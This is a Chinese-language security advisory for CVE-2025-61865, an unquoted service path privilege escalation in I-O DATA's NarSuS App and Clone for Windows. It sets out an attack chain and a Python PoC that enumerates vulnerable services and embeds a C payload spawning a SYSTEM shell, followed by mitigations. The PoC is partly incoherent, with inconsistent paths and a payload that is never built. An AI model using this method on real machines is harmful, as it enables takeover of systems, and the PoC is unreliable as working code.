CVE-2025-61865 I-O DATA NAS管理应用未加引号服务路径权限提升漏洞

漏洞信息

漏洞编号

CVE-2025-61865

漏洞类型

未加引号服务路径权限提升

CVSS评分

6.7 中危

攻击向量

本地 (AV:L)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

I-O DATA DEVICE, INC. NAS管理应用程序（NarSuS App、Clone for Windows）

漏洞概述

CVE-2025-61865是I-O DATA DEVICE, INC.提供的多个NAS管理应用程序中存在的一个权限提升漏洞。该漏洞的根本原因在于这些应用程序在注册Windows系统服务时，使用了未加引号的文件路径。当Windows服务启动时，如果服务路径包含空格且未用引号包围，系统会从左到右解析路径，在遇到第一个空格处停止，然后尝试在该位置查找并执行可执行文件。攻击者可以利用这一特性，在系统驱动器根目录（如C:\）下放置恶意可执行文件，诱使服务加载并执行恶意代码。由于Windows服务通常以SYSTEM高权限运行，攻击成功后，攻击者可以在目标系统上获得最高权限，执行任意代码、安装后门、窃取敏感数据或完全控制受影响的系统。该漏洞需要攻击者具备目标系统驱动器根目录的写权限，在本地环境下进行利用。

技术细节

未加引号服务路径漏洞（Unquoted Service Path Vulnerability）是一种常见的Windows权限提升漏洞。当应用程序通过CreateService或SC命令创建Windows服务时，如果指定的可执行文件路径包含空格且未被引号包围，Windows服务控制管理器在启动服务时会进行路径解析。以路径C:\Program Files\NAS App\nas_service.exe为例，系统会依次尝试执行：C:\Program.exe、C:\Program Files\nas.exe、C:\Program Files\NAS App\nas_service.exe。攻击者只需在解析路径的中间位置（如C:\Program Files\nas.exe）放置恶意可执行文件，即可实现代码执行。对于CVE-2025-61865，受影响的NAS管理应用程序（NarSuS App、Clone for Windows）在安装时会创建多个Windows服务，这些服务的可执行文件路径未使用引号包围，且路径中包含空格目录名。攻击者利用此漏洞需要以下条件：1）能够在系统驱动器根目录（如C:\）创建文件；2）服务重启或系统重启后恶意文件被加载执行；3）恶意文件具有SYSTEM权限的执行上下文。成功利用后可获得系统最高权限。

攻击链分析

STEP 1

步骤1: 信息收集

攻击者通过扫描目标系统，识别I-O DATA NAS管理应用程序（NarSuS App、Clone for Windows）是否安装，并检查相关Windows服务的配置信息。

STEP 2

步骤2: 漏洞识别

使用sc qc命令查询服务配置，检查BINARY_PATH_NAME字段是否存在未加引号且包含空格的路径，如C:\Program Files\I-O DATA\NarSuS\service.exe。

STEP 3

步骤3: 路径分析

分析服务路径中的空格位置，计算Windows解析器会尝试执行的中间路径。例如路径C:\Program Files\App\service.exe会触发C:\Program.exe的执行尝试。

STEP 4

步骤4: 恶意文件部署

攻击者利用已获取的系统驱动器根目录写权限，在目标位置（如C:\Program.exe）放置精心构造的恶意可执行文件，该文件可创建后门或建立SYSTEM权限的shell。

STEP 5

步骤5: 触发执行

等待服务重启、系统重启或管理员手动重启相关服务。当服务启动时，Windows服务控制管理器会按照解析顺序找到并执行攻击者放置的恶意文件。

STEP 6

步骤6: 权限提升

恶意代码以SYSTEM高权限执行，攻击者成功获得系统最高权限，可执行任意代码、窃取敏感数据、安装持久化后门或完全控制目标系统。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/usr/bin/env python3 """ CVE-2025-61865 PoC - Unquoted Service Path Privilege Escalation Target: I-O DATA NAS Management Applications (NarSuS App, Clone for Windows) Author: [email protected] """ import os import sys import time import subprocess def check_unquoted_paths(): """Check for unquoted service paths in affected applications""" services = [ "NarSuS_UpdateService", "NarSuS_MonitorService", "CloneForWinService" ] print("[*] Checking for unquoted service paths...") for service in services: try: result = subprocess.run( ["sc", "qc", service], capture_output=True, text=True ) if "BINARY_PATH_NAME" in result.stdout: print(f"[+] Found service: {service}") for line in result.stdout.split("\n"): if "BINARY_PATH_NAME" in line: print(f" Path: {line.strip()}") # Check if path contains spaces and no quotes path = line.split(":", 1)[1].strip() if " " in path and not path.startswith('"'): print(f" [!] VULNERABLE: Unquoted path with spaces detected!") except Exception as e: print(f"[-] Error checking {service}: {e}") def create_payload(exploit_path): """Generate malicious executable for privilege escalation""" payload_code = f''' #include <windows.h> #include <stdio.h> BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved) {{ switch (ul_reason_for_call) {{ case DLL_PROCESS_ATTACH: case DLL_THREAD_ATTACH: // Create reverse shell or execute arbitrary code as SYSTEM WinExec("cmd.exe /c whoami > C:\\\\temp_pwned.txt", SW_HIDE); break; }} return TRUE; }} int main() {{ // This executable will be placed at the unquoted path // and executed with SYSTEM privileges FILE *f = fopen("C:\\\\\\\\windows\\\\\\\\temp_pwned.txt", "w"); if (f) {{ fprintf(f, "SYSTEM shell obtained via CVE-2025-61865\\n"); fclose(f); }} // Spawn SYSTEM cmd.exe STARTUPINFO si; PROCESS_INFORMATION pi; ZeroMemory(&si, sizeof(si)); ZeroMemory(&pi, sizeof(pi)); si.cb = sizeof(si); CreateProcess("C:\\\\\\\\windows\\\\\\\\\\\\system32\\\\\\\\cmd.exe", NULL, NULL, NULL, FALSE, 0, NULL, NULL, &si, &pi); return 0; }} ''' print(f"[!] In real attack, malicious executable would be placed at:") print(f" {exploit_path}") print(f"[!] This file will be executed with SYSTEM privileges when service starts") def main(): print("="*60) print("CVE-2025-61865 PoC - Unquoted Service Path") print("Target: I-O DATA NAS Management Applications") print("="*60) # Step 1: Identify vulnerable services check_unquoted_paths() # Step 2: Generate exploitation path # Example: If service path is "C:\Program Files\I-O DATA\NarSuS\service.exe" # Attacker places malicious.exe at "C:\Program Files\I-O.exe" print("\n[*] Exploitation strategy:") print(" 1. Identify unquoted service path containing spaces") print(" 2. Calculate intermediate path for exploitation") print(" 3. Place malicious executable at that path") print(" 4. Wait for service restart or system reboot") print(" 5. Gain SYSTEM privileges") # Example vulnerable path example_path = "C:\\\\Program Files\\\\I-O DATA\\\\NarSuS\\\\NarSuS_service.exe" exploit_path = "C:\\\\Program.exe" # First space-separated word create_payload(exploit_path) print("\n[*] Mitigation: Apply vendor patches or use quoted paths") if __name__ == "__main__": main()

影响范围

NarSuS App (版本未明确)

Clone for Windows (版本未明确)

I-O DATA NAS管理应用程序 (多个版本受影响)

防御指南

临时缓解措施

在官方补丁发布之前，可采取以下临时缓解措施：1）检查并识别系统中是否存在NarSuS App和Clone for Windows等I-O DATA NAS管理应用；2）使用icacls命令限制C:\等系统驱动器根目录的写权限，仅允许Administrators和SYSTEM组写入；3）监控Windows事件日志中服务启动相关事件，查找异常进程执行；4）考虑使用Microsoft Attack Surface Analyzer等工具定期扫描未加引号的服务路径；5）如果业务允许，暂时禁用受影响的NAS管理服务，待官方修复后重新启用。